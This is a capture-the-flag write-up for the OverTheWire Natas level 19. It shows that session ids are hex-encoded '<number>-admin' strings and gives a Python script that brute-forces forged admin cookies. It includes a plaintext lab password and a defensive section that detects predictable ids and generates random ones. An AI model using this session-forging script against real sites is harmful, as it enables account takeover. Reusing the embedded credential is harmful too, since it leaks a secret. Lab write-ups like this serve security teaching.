The page starts with a message saying it is pretty much using the code from the previous one, except it is not sequential. Again, there is a username and a password field for you to log in as admin and retrieve credentials for natas20. No source code is available. I entered the username admin and the password password and intercepted the traffic using Burp. Let's see what the PHPSESSID looks like in the headers.
PHPSESSID=3534382d61646d696e; path=/; HttpOnly
That’s a lot of characters for brute force. However, if you notice, the session id looks like hex. I quickly checked what this is in ASCII.
That seems a little too good to be true. Notice I used the user admin, so let's modify our last script to enumerate 1 to 640 (hopefully $maxid is still the same), append “-admin” to that, convert the whole thing into a hex string, set the PHPSESSID and see if we can get the next password.
```python
#!/bin/python3
import requests
import binascii


def str2byte(s):
    return bytes(s, encoding='utf-8')


def byte2hex(b):
    # Two lowercase hex digits per byte, zero-padded
    return ''.join([hex(n)[2:].rjust(2, '0') for n in b])


def str2hex(s):
    return byte2hex(str2byte(s))


maxid = 641
user = "natas19"
passwd = "4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs"
url = "http://" + user + ".natas.labs.overthewire.org"
admin = '-admin'
match = "You are an admin. The credentials for the next level are:"

for i in range(maxid):
    # Session id format observed above: hex("<id>-admin")
    c = dict(PHPSESSID=str2hex(str(i) + admin))
    h = requests.get(url, auth=(user, passwd), cookies=c)
    if match in str(h.content):
        print(h.content)
        break
```
We got the next password in the content again (id=501). With the id at such a high number in the last level, I was tempted to run the range in reverse or use a random generator to pick my id. However, in real life, unless you have a reason to suspect the id is not generated randomly, there is no penalty for starting from the lowest number and going to the highest in a brute-force attack, because the average number of guesses will be the same ($maxid/2).
In the Python code, I reuse code from set 1 of the Matasano crypto challenges. There is documentation on how to convert between binary and ASCII below.
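The weakness from the defender's side, as an added example that is not part of the original post: a check that flags a session id as a hex-encoded "<counter>-<username>" string and estimates how many bits an attacker actually has to guess, next to a generator that draws the id from the OS CSPRNG. The function names are hypothetical, and `MAX_ID = 640` is the same assumption the post makes about $maxid.

```python
import binascii
import math
import re
import secrets

# Session id captured in the post for the login admin/password.
OBSERVED = "3534382d61646d696e"
MAX_ID = 640  # assumption: same upper bound as the previous level


def decode_structured_id(session_id):
    """Return (counter, username) if the id is hex of '<int>-<name>', else None."""
    try:
        text = binascii.unhexlify(session_id).decode("ascii")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None
    m = re.fullmatch(r"(\d+)-([A-Za-z0-9_.]+)", text)
    return (int(m.group(1)), m.group(2)) if m else None


def effective_bits(session_id, max_id=MAX_ID):
    """Bits of guessing work for a hex session id.

    A structured id only hides the counter, so the work is log2(max_id).
    Otherwise return the upper bound of 4 bits per hex digit.
    """
    if decode_structured_id(session_id) is not None:
        return math.log2(max_id)
    return 4.0 * len(session_id)


def new_session_id():
    """Hardened form: 128 bits from the OS CSPRNG, no user data embedded."""
    return secrets.token_hex(16)


if __name__ == "__main__":
    print("observed decodes to:", decode_structured_id(OBSERVED))
    print("observed bits to guess: %.1f" % effective_bits(OBSERVED))
    fresh = new_session_id()
    print("random id:", fresh, "bits:", effective_bits(fresh))
```

The 18 hex characters of the observed id suggest 72 bits, but because the username is known and the counter is bounded, the real search space is under 10 bits.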